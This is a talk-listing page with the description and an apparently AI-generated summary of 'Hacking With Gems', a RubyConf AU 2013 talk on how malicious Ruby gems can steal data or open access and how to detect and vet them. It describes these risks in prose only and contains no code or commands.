Talks
Speakers
Events
Topics
Sign in
Home
Talks
Speakers
Events
Topics
Leaderboard
Use
Analytics
Sign in
Suggest modification to this talk
Title
Description
RubyConf AU 2013: http://www.rubyconf.org.au What's the worst that could happen if your app has a dependency on a malicious gem? How easy would it be to write a gem that could compromise a box? Much of the Ruby community blindly trusts our gems. This talk will make you second guess that trust. It will also show you how to vet gems that you do choose to use. There are four malicious gems I will be presenting: - Harvesting passwords from requests going through a Rails app - Exposing the contents of a Rails app's database - Compromising the source code of a Rails app - Providing SSH access to a box a 'gem install' time and stealing gem cutter credentials (and going viral) My talk will increase awareness that these sort of gems can exist in the wild, show how easy it is for anyone to build malicious gems, and give easy techniques for identifying these gems.
Date
Summarized using AI?
If this talk's summary was generated by AI, please check this box. A "Summarized using AI" badge will be displayed in the summary tab to indicate that the summary was generated using AI.
Show "Summarized using AI" badge on summary page
Summary
Markdown supported
In the talk titled "Hacking With Gems," presented by Benjamin Smith at RubyConf AU 2013, the focus is on the potential dangers associated with using Ruby gems, particularly malicious ones. Smith initiates the conversation by questioning the community's blind trust in gems, noting that even seemingly trivial gems can pose significant security risks. The key points discussed include: - **Malicious Potential**: Smith reveals how easy it is to create gems designed to harvest sensitive data or compromise applications. - **Types of Malicious Gems**: Four specific examples of malicious gems are presented: - A gem that harvests passwords from Rails app requests. - A gem that exposes the Rails app's database contents. - A gem that compromises the source code of a Rails application. - A gem that grants SSH access upon installation and steals credentials. - **Creating Malicious Gems**: Smith describes the process of writing a harmless-looking gem that secretly collects sensitive data, emphasizing that anyone can create such a gem without advanced skills. - **Detecting Malicious Code**: Techniques for identifying and mitigating risks from malicious gems are discussed, including monitoring outgoing network calls and examining gem source code. - **Community Trust**: The speaker raises concerns about trust in popular gems, indicating that malicious code can be embedded even in widely-used libraries. - **Prevention Strategies**: Suggestions for safeguarding against malicious gems include rigorous vetting of dependencies, using private repositories, monitoring changes in the system, and possibly signing gems to ensure authenticity. Smith concludes with a strong recommendation that attendees should not blindly trust gems and should write their own code where feasible. He encourages vigilance in monitoring installed gems and emphasizes the importance of understanding the functionalities and behaviors of these dependencies. Through a mix of humor and serious warnings, Smith’s talk serves as an eye-opener about the cybersecurity implications within the Ruby ecosystem.
Suggest modifications
Cancel
